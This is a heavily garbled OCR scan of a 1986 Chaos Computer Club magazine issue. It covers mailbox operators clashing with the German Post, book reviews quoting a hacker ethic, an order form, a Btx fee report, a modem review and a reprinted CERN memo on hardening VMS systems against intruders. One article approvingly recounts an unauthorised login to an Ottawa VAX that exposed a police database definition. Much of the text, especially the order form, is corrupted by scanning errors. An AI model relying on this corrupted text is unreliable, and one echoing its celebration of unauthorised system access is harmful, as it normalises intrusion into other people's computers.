auf Telefonanrufe der User lauern, dann blitzschnell den Hörer 
hochreissen und ihn geschickt in die dofür vorgesehenen Gum¬ 
mimuffen des Koppler bugsieren... 

Mit mehr oder minder schlechter Oberfrogungsquolität konn 
dann der Dotentronsfer durch die modernen POSTIeitungsnetze 
(teilweise noch vor 1938 verlegt) beginnen. Nun hatten einige 
dieser Mailbox- Betreiber ober nach einigen Togen und Näch¬ 
ten des unermüdlichen .Durchwachens om Rechner den Wunsch 
nach Abhilfe! Besonders findige Köpfe bauten kranorfige Ge¬ 
bilde, die obenleuerliche Hebemechonismen in Betrieb setzen, 
die die Arbeit des Hörer Abhebens usw. mehr oder weniger ge- 
schiclctousführen. _ . . 

Seite 


Denn in jüngster Zeit fauchen bei ollen möglichen Mailbox-Be¬ 
treibern Bedienstete von Herrn Schworz- Schilling ouf und neh¬ 
men unter Bezug auf die gültige Fernmelde-Anlogen- Verord¬ 
nung (sie hier zu zitieren würde mehrere KByte Speicherplatz 
kosten) eben diese Boxen ausser Betrieb! Letztes Beispiel: 
M.C.S. Homburg, eine der ältesten Boxen in Deutschland über- 
houpt. Hangit es sich doch um eigenmöchtige Eingriffe und 
Veränderungen POSTeigener Apparate... 

(Remark: Wer also sein Telefon mit einem nicht FTZ-geprüften 
Aufkleber versehen sollte macht sich nach Angoben vieler Post¬ 
ler strafbar — xx) Die Kunde von solchem Handeln der Behörde 
oder wor es doch nur ein Dienstleistungs-Unternehmen, kommt 
nun aus allen Teilen der Republik in rapide steigender Zahl. Der 
nette Vorschlag der Beamten zur Abhilfe loutet ungefähr so; 
"Schicken Sie doch einfach Ihren Rechner nebst einer nach unse¬ 
ren Richtlinien gebauten RS 232-C Schnittstelle zur Einzelab¬ 
nahme on die FTZ- Vergabestelle nach Stuttgart. Dort stellt man 
dann schnellstens nach ca. 6 bis 9 monoliger Prühjng und gegen 
eine geringe Gebühr 

eventuell eine Einzelgenehmigung zum Betrieb mit einem bei 
uns gegen Gebühr leihbaren POSTmodem (DM 80,- /monatl.) 
aus! Eventuell ist dieses Modem dann sogar vorrätig!” Wirklich 
sehr hilfreich — oder??? 

Wir fragen nun Euch, die User, Hocker und Datenreisenden, 
muss das so sein und ist dos wirklich olles richtig so!?! Koum gibt 
es ein neues (im Ausland schon lange vorhandenes) Medium, so 
fühlen sich offensichtlich auch schon wieder einige höhrer 
Beamte um ihr Monopol betrogen. Es gibt jo schliesslich auch 
noch TELEBOX von der DBP, rür gewerbliche Anwender ge¬ 
plant. Leute die aus Spass an der Soche und ohne Kosten für 
andere Ideen verwirklichen sind dort aber ouch nicht gefrogt. 
Einige fürchten MÜSSEN DIE MEHLBOXEN SO SCHNELL 
SCHON WIEDER STERBEN? Aber die Mehlboxen sind ein klei¬ 
nes Sfücic Freiheit und Freizeit und verbreiten siche eher wie ein 
Virus mit West/Osl-Gefällel hCI0785 Sy/RAMses 

13 melboxlS.ws 860323 




Buchbesprechungen 


Datenschieuder 
15 = März 1986 


9^' 




^^^XEDBZQBZZ^ , 


101 Money-saving secrets Your 
Phone Company Won't Teil You 

101 Money-SavIng Secrets Your Phone Company Won’t Teil 
You 

"Writfen in the some irascible style os Teleconnect Mogozine 
(CQ41-113) which Newton publishes. 101 Secrets is mostley 
about cutting your phone expenses without losing ony Service. 
Some of the melhoas are Mochiavellian — deliberotely mess up 
the quolity of your phone lines, for instonce, so your employees 
spend iess time on the phone." schreibt Art Kleiner in der Whole 
Earth Review Winter 1985 über dos Buch von Harry Newton 
1983.94S..ca.lOUS§ 


Hackers Steven Levy 


Warum der Chef, der ins Telefonsystem seiner Angestellten 
eine sich oulomotlsch bet Privatgesprächen einscholienden 
Störsender etnbout, kein Hocker ist, geht ous dem folgenden 
Buch hervor. 

Hackers 

Dos Buch von Steven Levy war eine Art Grundlagentext ouf der 
US- "Hacker's Conference 84", deren Ergebnisse ob Seite 23 in 
der Hackerbibel unter dem Motto KEEP DE5IGNING beschrie¬ 
ben sind. Eine ousführllche Besprechung soll folgen, hier nur ein 
paar Zitate zum Thema Hackerethik: 

’l. Zugriff auf Computer und olles Wissen, was Dir hilft, Vor¬ 
gänge auf der Welt zu versthen, muß uneingeschränkt und um¬ 
fassend sein. Das Prinzip des Mitmachens gilt überall. 

2. Alle Informotionen sollten gratis sein. 

3. Mißtraue Autoritäten — fördere Dezentrolisierung. 

4. Beurteile Hacker nach Ihrem Handeln, nicht nach überholten 
Kriterien wie Diplomen, Alter, Rosse oder Stellung. 

5. Du kannst mit dem Computer Schönheit und Kunst produzie¬ 
ren. 

6. Computer können dein Leben positiv andern. {Ich denke, daß 
wir ohne Computer besser dron wären. Da sie aber in dieser 
Zeit wichtig sind, muß ich verstehen warum. Der sAtzer) 

(1984,458 S., ca §17.95, Doubleday and Company, 501 Franklin 
Ave., Garden City, USA-NY 1153. 

Die Lieferung on uns dauerte vier Monate und kostete etwa 90 
DM. 

Besser ist Anfrage an 
buchbel 5.ws 860323 Ou^ 


The Computer Underground 

The Computer Underground. 

Computer Hacking, Crashing, Pirating and Phreoking by M. 
Horry. 

LOOMPANICS UNLIMITED, der Verlag für kontroverse und 
unübliche Bücher mit Widmung an dos zweite Houptgesetz der 
Thermodynamik hot ein neues Buch herausgebracht. 

Zwischen Widmung "Dedicated To: G. Jones. Thonks for oll the 
times you baiied me out" und Quellenhinweisen eine Pulle von 
Information. Noch der Introduction finden sich die Kapitel Un¬ 
derground Bosics, The electronic Infornnation grid, Softwore 
Pirocy, Phreoking, Security agoinst Computer Espionoge, De- 
feating Computer Security, Hacking Networks, BßS'ing: Using 
the Boords bis zurConclusion. Im Anhang Telephony, Computer 
Hocking, Programme und Nummern. 

Umfang hackerbibelartig, aber schlic ht schwor z weiß. 

ISBN 0-915 179 31-6. Preis bei der hackerbibe¬ 

lähnlich bei CO. 8 Wochen Wartezeif.^^^^^^^ 

Johannes Gutenberg 

Johannes Gutenberg. 

In seinem Buch über Gutenberg schrieb Matthias Geske: 
Gutenberg; "Ich will eine ßucnwerkslott begründen wie diese 
hier. Die Menschen brauchen Bücher.,. 

'Verrennt euch nicht!" unterbrach ihn der Abt schorf. "Ihr mögt 
schon recht haben mit euren Überlegungen,... Ihr könnt nicht 
beurteilen, was dem Glauben und der Kirche nützt.... Die Bü¬ 
cher, die wir obschreiben, sind sorgfältig ausgewählt. Soll den 
der gemeine Mann om Wort Gottes herumdeuteln?" 

Oer Autor hat den wenigen bekannten Daten über das Leben 
Gutenbergs (aus Mainz verbannt, Schießpulverhandel in Poris, 
Edelsteinschleifer in Straßburg) einiges hinzugefügt. Ihm gelingt 
das Porträt eines unruhigen, aufgeweckten Mennes, mehr Er¬ 
finder und Entdecker als ßuchmensch. 

Matthias Geske: Johonnes Gutenberg. 176 S., Pb. Ab 9 Johren. 

onr(ch.lSBN3-89106012-2 

/ws/buchb215.ws 860322 1934 

Buch- Warnung! 

MSDOS im Detail 

Buchwornung: MSDOS im Detail. 

Dos Buch erweckt den Eindruck einer umfassenden MSOOS- 
Darstellung, die im Detail falsch ist. Der Haftungsausschluß im 
Vorwort Ist begründet. Die 10 MB-Plotte, auf der diese Doien- 
schleuder erstellt wurde, mußte aufgrund von Seite 33 neu for¬ 
matiert werden. ZItot; "Ein Störfall auf einer Diskette bzw. einer 
Datei kommt in der Regel sehr selten vor. Sollte ein solcher Fall 
allerdings eintreten, besteht die Möglichkeit, die Information 
mit dem RECOVER-Kommondo zu berichtigen. ... Hinweis; In 
allen RECOVER- Fällen gehen Informationen verloren. Hierbei 
handelt es sich jedoch nur um Teilmengen einer Dotei bzw. Dis¬ 
kette." 

Die bittere Wahrheit; Es sammelten sich nach dem RECOVER- 
Lauf 6,7 MB wichtiger Daten in Null Dateien on. Auf der Plotte 
gab es keine Directories mehr, nur 256 einsame Dateien voller 
wirren Zeugs. 

RECOVER ist der wohl gefährlichste MSDOS-Befehl, der noch 
nur 256 Doteien obstürzen konn und außerdem olle Unterver¬ 
zeichnisse (Subdirectories) komplett in eine Dotei zusammen¬ 
faßt. • 

Vor der Lektüre des Buches Ist zu warnen. P.P.VÖlzIng. MSDOS 

im Detail, iwt. ISBN 3-88322-142-2 

xi/ws/buchb315.ws 860323 1533 Sei "t B 14 


m:- 


Oatensch1euder Seite 15 
15 = März 1986 

Das wissenschaftliche Fachblatt Für Datenreisende 
Ein Organ des Chaos Computer Clubs 


Fn^fnbiMtt TEXlTFLL. L'iS It/lf; rj.atin hi 

Bedarf jeit dyevieTv l-or'mh l at-.t. f nl: cihop i er har . 


Redaktion Datenschieuder * Schwenkestraße 85 * 2000 Hamburg 20 * 


Rechnung (nur <ni t Bi eqel ) .''n'est.el. 1 fetzen 


ficL-imtsurg , RosttofTipel d.atum 


rmit wird um t-rf ü 1 I. i.ing der j m folqenderi qt üchz at'i 1 iftalii y spezf i z i. c?r tefi 
ztlich iinberect»::-nbar-f5r-i Wunscfien gctieteri . 

Beiträge zur Förderung des CCC 

_cccvw 2ß, tOß DM_, Au f i'ialimBgertjühr (einmalig, Ve?rwaltung> 

gei-jür-inch t p l...ei t s I: el 1 enriLurimer : _ ) 

CccFf ab 230 DM_,_Fordernde.^ Mitglied bis PS.2.B7 

_cccNt 1.20,00 DM_,_Ncirfnaler?. Hi tgJ .i ecl biüi 23.2. £17 

cccBI. 60,00 DM_,_Schüler u.ä. biin 20.2.87 

_cccS0 2'0,00 DM_,_Schaler u.ä. biB 31.0.86 

naturgemäß portofrei und unverpackbar 
("han*?,—mit Behalt tag oder ru.chd 

_dsP£ 2,50 DM_,_PrQbt?e:':en)pl ar d<n-atd;uel 1 

Ein Abo bringt Unbekanntes öfter? 

_dsLl 999,99 DM_, Leherisaljo ds (wer oder wa«; lebt langer?) 

_dsFl ata 1.00 DM_,_Fnrdnrabo ß Ausgabe-n () Jalir ) 

_dsNl 60,00 DM_,_Jahresaho S A. Normal verdi«5n€*r 

_dsSl 30,00 DM_,_Sonclerabo S A. NUR Schulter u.ä. ! ! ! 

_dsH0 60,00 DM_,_Sonderabo und Hackeyrbi bei Teil 1 

dsPE-dsH0 jeweils inkl. Porto/Verp, 

_dsHi 33,33 DM_,_HeckerL/.i bei Teil 1 

_ dsKlÖ 3,33 DM _,_ je 10 Kleber CCC Kabelsalat spriwasge. 

_ dsKCC 1,00 DM _,_ 1 Kleber Chaos Cnoten wasserfest 

_dsAbta 3,33 DM_,_ 6^ Kleber Achtung Abhörge-fahr A4 

(J.6?tztt3re sind z.Z. nicht lieferbar) 

_dsKop --,33 DM_,_pro Btück Fotokopien aus dem Archiv laut 

bei 1iegender Liste ( nur für Redakteure ). 


Ich liefere deshalb: 


Versand erfolgt -frühestens nach 
Beldeingang. 

With Inflation, 
were an even betten buy! 


Brtmarkn —,05 DM _,_ were an eve 

Ör -fmarkn - , 50 DM_,_ 

Brfmarkn —,80 DM _,_ und in folgender Form: 


sind zusamrrien 


Alls rfordrlch btt sorgfltg ausflln? 

Nchts wchtgs wglassn!!! 

Wr habn sehn gnug zu tun mt Vrwaltngssche 


Afas Datenschieuder 2HH20 C9927F 
I Ausgefüllt am: ! 


< — fli er Adr essf: 1 eher be f- ust i gen 

z we?i ten an heften ?. um Ver sch i cken 
falls nlcl'i: mind. I DM Trinkgeld 
Aufschlag für Mehrarbeit und 
<— Adresse hier links lesbar 
eintragen I 

Hier DatumstempelplaLz für Verwaltung 


_V_V_V_V_ v_ 

Auslieferung Archivierung Vernichtung 


Formblatteingang Geldeingang 


(*> Leitstol1enummer umfast mind. 4 Ziffern. Stelle 1+2 ist Tel-Vorwahl 
HH 40, Berlin 30, KÜel 43 usw. Wünsche werden riach Möglichkeit erfüllt. 





















Hj^nburg 

IM 




Datenschleuder Sei te I0 
15 = März 1986 





I 

•■I 

ßtx-Oebakel 

Zum 1. Juli will die POST die Speicher und Verkehrsgebühren für 
das Blödeitexlsystem zu SO^/o erheben, verlautet aus dem Post¬ 
ministenum. Für den CCC bedeutet das, daß der jetzige Pro- 
grommumfang mit über 2000 Btx-Seiten ca. 3000 DM pro Mo¬ 
nat kosten und dann nicht mehr über dos Spendenaufkommen 
der BtX“ Seiten finanziert werden kann. 

Neben dem CCC werden viele kleinere Informationsdienste — 
sofern es sich nicht um Werbung oder Telefonsex (der Chef be¬ 
zahlt via Teiefonrechnungl) handelt — ihre Informationspro- 
gromme sehr einschränken, in vielen Fällen gor oufgeben müs¬ 
sen, Dadurch wird Btx die derzeit wohl teuerste »Wunschma¬ 
schine“ (ED007). 

Die neue Software, die eine Gebührenerhebung erst ermö¬ 
glicht, ist in einigen Punkten noch verbesserungswürdig. Zwar 
gibt es ein neues Identifizierungsverfahrenj man benötigt für 
jede wichtige Funktion ein neues Kennwort (ideal für Mütter und 
Väter von fünf Kindern), jedoch geht die neue Version zu Lasten 
der Vergütungsabrechnungen. Btx-Teilnehmer und Anbieter er¬ 
holten keine aktuellen Hinweise mehr über Ihr Gebührenauf¬ 
kommen, die Abrechnung geschieht monatlich (oder später). 
Der CCC überarbeitet seit geraumer Zeit sein ßtx-Programm 
nur noch zu oktuellen Anlässen. Der Club wird sein bisheriges 
Programm zum 15. Juni löschen und ein neues Sparprogramm 
mit circo 200 Informationsseiten anbielen. Um den Abruf, wie 
bisher, auch von öffentlichen Geräten zu ermöglichen, werden 
keine Abrufgebühren erhoben. Wir hoffen auf ein kostendec¬ 
kendes Spendenaufkommen über Industriegeröfe. 

Mit Erstaunen wurde In der Btx-Redoktion das Informationsan- 
gebof zu „Datenschutz und Datensicherheit" der POST zu An¬ 
fang März aufgenommen. Fachleute forderten schon vor ge- 
roumer Zeit (ds3 März 84, HaSpa-Coup November 84), daß die 
Post die Verbraucher oufklören muß. Verbroucheroufklörung 
wurde von der POST vergessen. Die Werbestrategien wurden 
fünf Johre im voraus geplant. Die Post zeigte hier eine Flexibili¬ 
tät, die jede andere Firma in döh Ruin getrieben hätte. 

Den 40.000 ßtx-Teilnehmern kündigt sich ein ous Prestel-Zeiten 
bekanntes Problem on. Mit Einführung der AlphoGeomefrie 
(Graphilclevelj benötigen die Teilnehmer, die weiter Vorne (!) 
bleiben wollen, auch neue Decoder. Die alten können Alpha¬ 
geometrie nicht dorsfetlen und lassen sich auch nicht umrusten. 
Um diese Tatsache dem Teilnehmern noch zu verheimlichen 
empfiehlt die POST Btx-Selten des neuen Standorts nur in ge¬ 
schlossenen Benutzergruppen anzubieten. Is23 
btxlS.ws 



Total Telecommunications 
Einsteekmodem für den C64 

Totol Telecommunicoflons 
Einsteckmodem fürC64 

Auch am DBP-Telefonnetz bewahrt sich dos TT-Modem für 
unter DM 150. Die Anschlußstrippe entspricht zwar dem omeri- 
konischen Telcom-Stondard, die mit deutschen Anschlußnormen 
nichts gemein hot. Treibersoftwore gibts gegen Aufpreis, aller¬ 
dings nur eine mühsam aus dem amerikonischen odaptierte 
Version. 

Techn isch ist das Modem sauber aufgebaut, ohne exotische 
Bauteile und recht übersichtlich. Der Userporlstecker führt die 
wichtigsten Daten- und Steuersignale zum Rechner, als da sind; 
RxD, TxD, DCD, Ring Indlcotor sowie ein Steuersignal zum An¬ 
schalten und Wählen. Erfreulicherweise wurde die Belegung so 
gestaltet, doß das Modem sich ohne Probleme mit Sfnndord- 
programmen wie VIP Term oder Vidtext benutzen laßt. Mail¬ 
boxnetrieb ist auch möglich (sollte ober wegen der POST unfer- 
lossen werden), bei einigen Stondordprogrommen sind aller¬ 
dings Anpassungen nötig. 

Leider beschränken sich die Obertrogungsfohigkeiten des Ge- 
rötes auf CCITT V.21, also 300 Boud. mit automoiischer 
Answer/Originate- Erkennung. Für Otto-Normoluser, der sich 
auf die Datenkommunikation mit lokolen Telefonboxen be¬ 
schränkt oder eine solche betreiben will, ist dos völlig ousrei- 
chend und dos Total Telecommunications Modem arbeitet hier 
sauber und zuverlässig. Als Treibersoftwore wird vom Impor¬ 
teur ein Terminalprogramm angeboten, dos die Stondordfunk- 
tionen bietet, nicht mehr. Allerdings ist die Bedienung elwos 
umständlich, ein Untermenü jogt dos nöchste. und man verpoßf 
leicht die wichtigen Funktionen. 

Dies wird durch dos mehr als ousführüche Hondbuch ousgegli- 
chen, dos auch eine recht gelungene Einführung in dos TT-fDo- 
tenbonksystem bietet, welches ollerdings für bundesrepublika¬ 
nische User schwer erreichbar sein dürfte, da cs nur auf dem 
nordomerikonische Kontinent prösenl ist. 

Fazit: ein recht brouchbores und preiswertes Modem, wenn 
mon gewillt Ist, sich auf 300 Bd zu beschrönken. Auf dos onge- 
botene Terminolprogramm konn mon getrost verrichten. 

Für BIM-kompatible Rechner liefert die Firma RESCO (Augsburg 
0821- 524033) auch ein Modem mit V.24 Dose. Die zugehörige 
Software {inkl, unter DM 200,-) kann komfortoble Mokros 
abarbeiten und gestattet kennwo'-tgeschülzten Fernzugriff. 
Totaltl5 860215 1358goblin 




Dieser Hilferuf hallt durch manchen Operator¬ 
raum in den Rechenzentren unserer Welt. 
Doch um Mißverständnissen gleich vorzube¬ 
ugen; ln den USA ist dieser Ruf etwas anders 
zu Interpretieren als in diesem unserem Lande. 
So bedeutet “Hilfe Hacker" in der BRD eifriges 
Gelaufe mehr oder weniger kompetenter Per¬ 
sonen durch verwinkelte Gänge im Rechen¬ 
zentrum, faszinierte und/oder bestürzte Ge¬ 
sichter vor wild blinkenden Masterkonsolen, 
schimpfende Putzfrauen, die sich durch Berge 
von Printouts kämpfen und Hab-ichs-nicht- 
gleich-gesagt Blicke frustrierter Betriebsräte, 
bis einer auf die Idee kommt, den 220V-Reset 
durchzuführen, der auch den hartnäckigsten 
Hacker auf die Erde zurückholt (DATEX-P: 
Ausloesung • Gegenstelle eingeschläfen). 

In den USA werden Hacker mit etwas anderen 
Augen betrachtet, wurde doch der Nutzeffekt 
der Phreaks schon vor Jahren erkannt (Viva 
Cheshire !), ja, die ersten Hacker haben eine 
regelrechte Tellerwäscherkarriere hinter sich 
und leiten jetzt diejenigen Konzerne, die die ja 
so hackerfreundlichen Rechner der Nachfol¬ 
gegeneralion produzieren, ln Deutschland ist 
so etwas momentan noch undenkbar, die li¬ 
berale Denkweise scheitert wieder mal am 
Konservatismus. Gerade ein 

{Kommunikations-)Entwicklungsland wie das 
Unsfige sollte auch Denkanstößen aus Hac¬ 
kerkreisen Gehör schenken: es kann nur von 
Vorteil sein, denn bei uns wären Hacker noch 
billig zu bekommen (vgl. USA), wenn nicht 
umsonst, denn es zeichnet sich eine Symbiose 
ab: der Hacker gemäß der Philosophie "Öffnet 

lapressu« I 

Di» Dat»n5chl»udBr 1&, M. Sep 1984. 

-Das Hissenschaftliche Fachblatt 
fucr Datenrai%ende 
D'2008 Hamburg 20 
Scbwenckestrats» 9S 
Geonett Geol:ChaoB-Taam 
Btx I *6553211 

H»rausgeb»r und ViSdPGi 
H»rwart Holland-Horiti 

Mitarbeitar ditaar Auagabe (u.a.) 

R. Schrutzlei, S. Warntry, A. Eichlar, 

P. Franck, H. Gru»l, M. Kuehn., 

Andy H.-H., 5, Stahl 
Eigandruck in SalbitvarJag. 

Sapianbar 1986 » 


iOi 


die Netze - Dezentralisierung der Inlormation“ 
freut sich über jedes Passwort, der Betreiber 
kann seinen Rechner vor wahren Gefahren 
(durch Crasher, Wirtschaflkriminalität usw.) 
durch erfahrene Hacker schützen lassen. Nicht 
zu verachten der Lerneffekt, denn spielerisch 
lässt es sich nun einmal leichter lernen, und 
Bildungsförderung nimmt der Staat ja für sich 
in Anspruch. 

In der Realität sieht es leider noch so aus: 
Softwaretests auf Gro ßrechenanlagen werden 
von Hackern in Eigenregie durchgeführt. So 
konnte man das auf der CeBit vorgestellte 
Programmpaket ALL-IN-1 (alles eins, kon¬ 
zeptionell mit Lotus-1-2-3 auf Personals ver¬ 
gleichbar) fuer VAX-Rechner von DEC auch im 
praktischen Einsatz auf einem Rechner in Ot¬ 
tawa bewundern. Unter dem Usernamen ORF 
konnten die Vorzüge des Programmpaketes 
mit einem VT-100 Emulator und einer Datex¬ 
verbindung genauestens untersucht werden. 
Eher zufällig stiess man bei dem inoffiziellen 
Softwaretest auf die Datenbankdefinition der 
Ottawa Police Force (eben jener ominoese 
OPF) für ein Rasterlahndungssystem (suspi- 
cious flag=false). Der Test fiel von Hackerseile 
her recht positiv aus, die Gegenstelle antwortet 
allerdings bis heute nicht (kommentarloser 
Rausschmiss). Ueberhaupt zeigen sich Rech¬ 
nerhersteller recht unkooperativ gegenüber 
Hackern, zumindestens, was größere Kon¬ 
zerne angeht (“Wozu haben wir unsere teuer 
bezahlten Spezialisten“). Ein weit umherge¬ 
reister Hacker beweist innerhalb von Minuten, 
daß das Geld fuerteure Spezialisten sinnvoller 
angelegt werden könnte, z.B. zur Finanzierung 
einer Nui für Weiterbildungszwecke (Teilneh¬ 
merkennung dBildung sehraktiv). Datenreisen 
bleibt immer noch eine teure Angelegenheit, es 
beginnt schon bei den Postdiensten. Wir war¬ 
ten noch auf Billigreisen, sei es nun nach Nec¬ 
kermannschema ("3 Wochen Sonne im Bitnet“) 
oder Rainbow-Tours (“2 1/2 Tage Superstim¬ 
mung im Fermilab“), warum nicht öffentliche 
Datenbank-Telefonzellen mit .Terminal und 
Geldeinwurf (Ortsgebühr versteht sich, und 
kommt mir jetzt nicht mit Blödeltext)! Es gibt 
noch viel zu tun in diesem unserem Lande, es 
sind die Hacker, die sich autratfen und die 
Betreiber zum Handeln zwingen! Denn der 
Hilferuf soll in Zukunft nicht als “Hilfe wir haben 
Hacker!“, sondern als “Hilfe, wir brauchen Hac¬ 
kerl!“ interpretiert werden. 


DSieHILFHACk.TXT rniMP 29,M.(986 







To : VMS System Managers 

From : SecurityManager 

Subject : Security Against Hackers _ 

Recently, we hava seen a number of oocurrancas intruder tried to pass {as aJready h^pens for 
of peopia logging in to CERN VAXs via unautho- VXCRNA). Closing the EXCITE/INDEX gap is 

rised accounts and establishing new aocounts for equally ditficult since it implies olosing access irom 

themselves or altering existing accounts for their a set of X25 addressas, some of which might be 
own use. Last year, this happened mainly to the legitimately employed by valid CERN users. 
VXGIFT machina and on two occaslons, time was Most of the following pointe are lully described in 
lost atter maliclous damage was done. the VMS V4 System Security manua' 

SincethestartofFebnjary, VXCRNA hasbeen the * The most obvious first precaution it, lorall users 

main targot, but hot the only one; VXDEV, to have effective passwords. Cases where user- 

VXMERL, VXOMEG have been affeoted also. On name = password should be positively banned. At 

VXCRNA. the effects hava been lass severe in first sight, the only risk in having such trivial pass- 

terms of actual damage (although at least one wordswouldbethelossorcorruptionofthatuser’s 

System crash can be traced to the running of a flies. However, once inside the System, a VMS- 

privileged program by the intruder). However, se- knowledgeable intruder may well find other inter- 

veral members of the Support team have had to esting possibilities. VMS is not hacker-proof, espe¬ 
spend a lot of time investigating these incidenfs cially if some of the following items are not re- 

and repairing the damage and a few users have spected. A simple DCL command flle can be used 

had their accounts made temporarily unavailable to check for such useless passwords. 

when the Intruder(s) changed the password or However, even this rulels not sufficient.Using first 

when the Support team suspended access to them names as passwords is almost equally useless; or 

after Ihey had been used to enter the VAX. Initials; or IBM login Codes. System managers 

Wa will leave aside for now the quest'on of how should enforce minimum length passwords, say a 

such “hackers" first get access to privileged ac- minimum of 5 oharaoters. In the limif, the use of 

counts in a given machine. Once they get such password expirytimes mightbenecessary.forcing 

access, these people are very knowledgeable regulär changes of password. This last item, for- 

about VMS and they can set themselves up many cing password changes, might be thought to re- 

otherwaysinto the System. Ithastaken mucheffort duce the user-friendliness of VMS (as do most of 

toreach the Stage wnerewe now believethat they the suggestions in this paper), but it would be 

can do no further harm Inside VXCRNA and even usefui to traca accounts unused for a long time; 

now.weacceptthattheremaystillbewaysinwhich these are exactlythe accounts that hackerspick on 
they can log in. to adapt for their own use. 

Who are these people and how do they access Where a user has some special privilege (and this 

CERN. Apart from the ocoasional hackerwhomay should bekeptto a minimum), such regulär chan- 

be a user on some connected System who gets ges should be enforced and perhaps the minimum 

bored late at night and tries to ses what he can length should be longer. Apart from the obvious 

reaoh and whatfun he can have, thereseems tobe Privileges to be careful with (SETPRV, SYS*, 

a Club based in Germany oalied the "ohaos club“ CMKRNL, BYPASS. OPER, etc) are DETACH and 

whose colleotive hobby is hacking Systems con- READALL. The first gives its owner the possibiliw 

nected to public X25 networks. We have identified to issue a RUN/UIC= command where the UIC 

one memoer of this dub in Düsseldorf and the could be a System IDI The second gives write 

"working alias" of a second in Berlin. We are cur- access to all nie headers, thus allowing its owner 

rently investigating what Steps we can take to to change a fila protection, for example. 

ourtail their anB-social activities. * Users should NOT keep passwords in flies on 

This paper lists a few hints on how to make Systems disc, for example to help them log in to another VAX 

a little more secure. It must be emphasised that across the network. This compromises not only the 

ALLCERNsystemsmuslbeprotected.Thepeople accountbeing hacked, buttheoorresponding VAX 
doing this hacking are very ingenious. They know also. 

all about networks. We have seen evidenoe that * Some terminals allow their owners to störe cha- 

they enter CERN via one System and use DECNET racter strings in memory to be activated on a single 

to get to their real target System. Even If all CERN or multiple keystroke(s). Unless you can be sure 

Systems were fully protected, it might not be that your terminal is totally secure (either in a 

enough. There would still remain two large gaps permanenfly locked Office or at home and out of 

through which they might pass. One is via the reach of the childrenll), then you should not störe 

CERN EXCITE network where they would log Inlo login sequences in the memory of your terminal. 

INDEX and then connect to any VAX; the second * The BACKUP program Stores the command 

Is Ihrouqh a System outside CERN, forexample, on String used to create a backup save set in the save 

INFNET and then into CERN via DECNET. set itself. If you use DECNET to create a backup 

Stopping the second of these might be possible if save set and you include the usemame and pass- 

weencourage the System managers of all Systems word in the command string in the form node''u- 

on the network to take the same Steps asdescribed semame password"::... then the password will ap- 

In this note with the threaf that wewouldbeobliged ^ pear in olear text in the save set. We have oom- 
to dose the link to any System though which an i' plained to the author ol BACKUP about this but 



there Is little chance of a solution. 

* From time to time, bugs or seourity gaps are 

reported in particular versions of VMS. These 
should be closed as soon as a fix Is avallable. For 
example, under VMS x.x, any user in the System 
can xxxxxxxxxxxxxxxxxxxxxxxxx to the System 
xxxxxxxxxxxxxxxx(andonofher xxxxxxx 

xxxxxxxxxx in the System). This is equivalentto the 
xxxxxx xxxxxxxxx and can lead to abuse. The 
published protection against this is to set the fol¬ 
lowing command into the 

xxxxxxxxxxxxxxxxxxxxxxxx 
Sxxxxxxxxxxxxxxxxxxxxx 
$xxxxxxxxxxxxxxxxxxxxx 

xxxxxxxxxxxxxxxxxxxx 
This bug Is fixed in VMS x.x. 

* System managers raight consider restricted ac- 
cBss to certain privileged accounts during nights 
and Weekends. This is easy to Implement using the 
primary/secondaiy options in the authorisation flle 
and a command flle run at regulär times. Accounts 
such as xxxxxxx and xxxxxxxxxxxx should allways 
be disabied when not in active use and their pass¬ 
words Should allways be changed from the VMS 
defaulf. However, does the S YSTE M account need 
to be open all weekend when you know it will not 
be needed until Monday? Perhaps such accounts 
should be disabied for access in NETWORK mode 
or from DIALUP lines. And so on. 

A particular case of this is the xxxxx account. ln 
general, xxxxxxxxxxxxxx are not careful with their 
passwords, especially on a site with many VAXs. 
It is strongly suggesfed that xxxxx should be ge- 
nerally disabied unless xxxxxxxxxxxxxx have been 
called A trivial command Ille run by any privileged 
user (OPS or SYSTEM) could be written to enable 
It. If you wanl xxxxx xxxxxxx to be able to look at 
your error log without your enabling their account, 
they could be given a non-privileged account and 
access to the error log via an access confrol entry. 
While xxxxxxxxxxxxx might (will) not like this, if is 
Standard practice in many Digital Offices as well as 
atsome usersites. 

* Some flies should be protected by seourity access 
control entriss such that certain types of access to 
them are logged. Examples would be SYSUAF.- 
DAT, VMSIMAGES.DAT, the NEr.DAT flies in 
SYS$SYSTEM. all page, swap and dump flies. All 
thes flies have no need to have any 'World" access, 
not even read. The RIGHTSLISf.DAT Ille howe¬ 
ver, does need world-read access but could have 
an access control entry for other types of access. 
Finally, any xxxxxx and xxx xxxxx xxxxx should 
have no worid access since they may xxxxxxx xxxx 
xxxxxxxxx. 

* Some Images may be left generally accessible 
but instalied with accounting selectively enabied so 
that their use is recorded. Examples here would 
Include INSTALL. NCP, AUTHORIZE, ACCOUN¬ 
TING. The aim is not to stop them being used (a 
ciever hacker could easily get round this) but to be 
able to see when they are used and by whom. 

* The various VMS xxxxxxxx xxxxxx should be 
xxxxxxx. These will log breakin attempts, changes 
to the authorisation flle and so on. These can be 
linked to CERN-wriften programs which will, for 
example, kill any unauthorised process which tries 



to change the authorisation flle, dose a DECNET 
link which is being used to hack the System, send 
warning messages to a given account or accounts 
when such incidents occur; and so on. These 
programs are avallable from xxxxxxxxxxx 

* If you have xxxxxxxxxxxxxxx, your System could 
be used asa“portof entry"forthese Hackers. There 
exists a Standard xxxxxx utility called xxxxxxxxxxxx 
which will allow the System managerto set up a list 
of DTE (X25 addresses) to or from which calls are 
allowed orexcluded; allst of users who are allowed 
to use X25 to gain access to or from a remote 
System; and a list of "Objects" (programs) which are 
accessible via X25 for remote users. Although this 
might seem a little heavy - and the dooumentation 
may need to be read several times before it is 
understood - X25 System managers are strongly 
encouraged to consult the xxx documentation for 
more details on xxxxxxxxxxxx. 

* Other network products, e.g. J-NET, may have 
their own security gaps. We have done some 
simple tesfs on TCP/IP and EAN and found the 
following. 

In TCP/IP, the System manager can declare Server 
processes. It seems that TCP/IP Starts such pro- 
cesses with whatever privilege It itself is Instalied 
with. Since this usually indudes CMKRNL, your 
System is thus vulnerable to simple coding errors 
by the author of the Server, without even consi- 
dering the dangers of hackersi We are investiga¬ 
ting this. 

EAN has an even bigger loophole. When users 
register with EAN, they are asked for an EAN 
password. This Is then stored In a flle on the users 
account with a Standard name - in olear text. 
Further, this Ille is created by EAN with worid read 
privilege! Although users are requested to choose 
a different password to their VMS passwords, ma¬ 
ny use the same password. We are investigating 
making this flle less accessible. System managers 
with EAN instalied are Invited to contact me for the 
name of this flle. 

* If you suspect that your System hasbeen hacked, 

Isolate the account used as soon as possible. 
